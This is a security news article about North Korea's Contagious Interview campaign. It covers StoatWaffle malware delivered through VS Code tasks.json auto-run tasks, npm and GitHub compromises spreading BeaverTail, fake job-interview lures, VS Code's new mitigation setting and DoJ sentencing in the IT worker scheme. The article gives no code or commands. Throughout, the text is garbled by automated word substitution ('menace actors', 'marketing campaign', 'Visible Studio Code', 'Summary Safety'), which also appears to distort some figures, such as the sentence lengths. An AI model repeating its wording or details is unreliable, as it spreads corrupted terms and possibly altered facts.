The North Korean menace actors behind the Contagious Interview marketing campaign, additionally tracked as WaterPlum, have been attributed to a malware household tracked as StoatWaffle that is distributed by way of malicious Microsoft Visible Studio Code (VS Code) initiatives.
Using VS Code “tasks.json” to distribute malware is a comparatively new tactic adopted by the menace actor since December 2025, with the assaults leveraging the “runOn: folderOpen” choice to robotically set off its execution each time any file within the undertaking folder is opened in VS Code.
“This task is configured so that it downloads data from a web application on Vercel regardless of executing OS [operating system],” NTT Safety stated in a report revealed final week. “Though we assume that the executing OS is Windows in this article, the essential behaviors are the same for any OS.”
The downloaded payload first checks whether or not Node.js is put in within the executing setting. If it is absent, the malware downloads Node.js from the official web site and installs it. Subsequently, it proceeds to launch a downloader, which periodically polls an exterior server to fetch a next-stage downloader that displays an identical habits by reaching out to a different endpoint on the identical server and executing the obtained response as Node.js code.
StoatWaffle has been discovered to ship two completely different modules –
- A stealer that captures credentials and extension knowledge saved in internet browsers (Chromium-based browsers and Mozilla Firefox) and uploads them to a command-and-control (C2) server. If the compromised system runs on macOS, it additionally steals the iCloud Keychain database.
- A distant entry trojan (RAT) that communicates with the C2 server to fetch and execute instructions on the contaminated host. The instructions enable the malware to vary the present working listing, enumerate information and directories, execute Node.js code, add file, recursively search the given listing and listing or add information matching a sure key phrase, run shell instructions, and terminate itself.
“StoatWaffle is a modular malware implemented by Node.js, and it has Stealer and RAT modules,” the Japanese safety vendor stated. “WaterPlum is continuously developing new malware and updating existing ones.”
The event coincides with varied campaigns mounted by the menace actor focusing on the open-source ecosystem –
- A set of malicious npm packages that distribute the PylangGhost malware, marking the primary time the malware has been propagated by way of npm packages.
- A marketing campaign often called PolinRider has implanted a malicious obfuscated JavaScript payload in a whole bunch of public GitHub repositories that culminates within the deployment of a brand new model of BeaverTail, a recognized stealer and downloader malware attributed to Contagious Interview.
- Among the many compromises are 4 repositories belonging to the Neutralinojs GitHub group. The assault is alleged to have compromised the GitHub account of a long-time neutralinojs contributor with organization-level write entry to force-push JavaScript code that retrieves encrypted payloads in Tron, Aptos, and Binance Sensible Chain (BSC) transactions to obtain and run BeaverTail. The victims are believed to have been contaminated by way of a malicious VS Code extension or an npm bundle.
Microsoft, in an evaluation of Contagious Interview this month, stated the menace actors obtain preliminary entry to developer programs by “convincingly staged recruitment processes” that mirror authentic technical interviews, in the end persuading victims into operating malicious instructions or packages hosted on GitHub, GitLab, or Bitbucket as a part of the evaluation.
In some instances, targets are approached on LinkedIn. Nevertheless, the people chosen for this social engineering assault will not be junior builders, however somewhat founders, CTOs, and senior engineers within the cryptocurrency or Web3 sector, who’re prone to have elevated entry to the corporate’s tech infrastructure and cryptocurrency wallets. A current incident concerned the attackers unsuccessfully focusing on the founding father of AllSecure.io by way of a pretend job interview.
A number of the key malware households deployed as a part of these assault chains embrace OtterCookie (a backdoor able to intensive knowledge theft), InvisibleFerret (a Python-based backdoor), and FlexibleFerret (a modular backdoor applied in each Go and Python). Whereas InvisibleFerret is understood to be sometimes delivered by way of BeaverTail, current intrusions have been discovered to distribute the malware as a follow-on payload, after leveraging preliminary entry obtained by OtterCookie.
It is price mentioning right here that FlexibleFerret can be known as WeaselStore. Its Go and Python variants go by the monikers GolangGhost and PylangGhost, respectively.
In an indication that the menace actors are actively refining their tradecraft, newer mutations of the VS Code initiatives have eschewed Vercel-based domains for GitHub Gist-hosted scripts to obtain and execute next-stage payloads that in the end result in the deployment of FlexibleFerret. These VS Code initiatives are staged on GitHub.
“By embedding targeted malware delivery directly into interview tools, coding exercises, and assessment workflows developers inherently trust, threat actors exploit the trust job seekers place in the hiring process during periods of high motivation and time pressure, lowering suspicion and resistance,” the tech large stated.
In response to the continued abuse of VS Code Duties, Microsoft has included a mitigation within the January 2026 replace (model 1.109) that introduces a brand new “task.allowAutomaticTasks” setting, which defaults to “off” so as to enhance safety and forestall unintended execution of duties outlined in “tasks.json” when opening a workspace.
“The update also prevents the setting from being defined at the workspace level, so malicious repositories with their own .vscode/settings.json file should not be able to override the user (global) setting,” Summary Safety stated.
“This version and the recent February 2026 (version 1.110) release also introduce a secondary prompt that warns the user when an auto-run task is detected in a newly opened workspace. This acts as an additional guard after a user accepts the Workspace Trust prompt.”
In current months, North Korean menace actors have additionally been partaking in a coordinated malware marketing campaign focusing on cryptocurrency professionals by LinkedIn social engineering, pretend enterprise capital corporations, and fraudulent video conferencing hyperlinks. The exercise shares overlap with clusters tracked as GhostCall and UNC1069.
“The attack chain culminates in a ClickFix-style fake CAPTCHA page that tricks victims into executing clipboard-injected commands in their Terminal,” MacPaw’s Moonlock Lab stated. “The campaign is cross-platform by design, delivering tailored payloads for both macOS and Windows.”
The findings come because the U.S. Division of Justice (DoJ) introduced the sentencing of three males — Audricus Phagnasay, 25, Jason Salazar, 30, and Alexander Paul Travis, 35 — for his or her roles in furthering North Korea’s fraudulent data expertise (IT) employee scheme in violation of worldwide sanctions. All three people beforehand pleaded responsible in November 2025.
Phagnasay and Salazar have been each sentenced to a few years of probation and a $2,000 fantastic. They have been additionally ordered to forfeit the illicit proceeds gained by taking part within the wire fraud conspiracy. Travis was sentenced to at least one 12 months in jail and ordered to forfeit $193,265, the quantity earned by North Koreans through the use of his id.
“These men practically gave the keys to the online kingdom to likely North Korean overseas technology workers seeking to raise illicit revenue for the North Korean government — all in return for what to them seemed like easy money,” Margaret Heap, U.S. legal professional for the Southern District of Georgia, stated in an announcement.
Final week, Flare and IBM X-Power revealed an in depth have a look at the IT employee operation and its inner construction, whereas highlighting how IT employees attend prestigious universities in North Korea and undergo a rigorous interview course of themselves earlier than becoming a member of the scheme.
They’re “considered elite members of North Korean society and have become an indispensable part of the overall North Korean government’s strategic objectives,” the businesses famous. “These objectives include, but are not limited to, revenue generation, remote employment activity, theft of corporate and proprietary information, extortion, and providing support to other North Korean groups.”
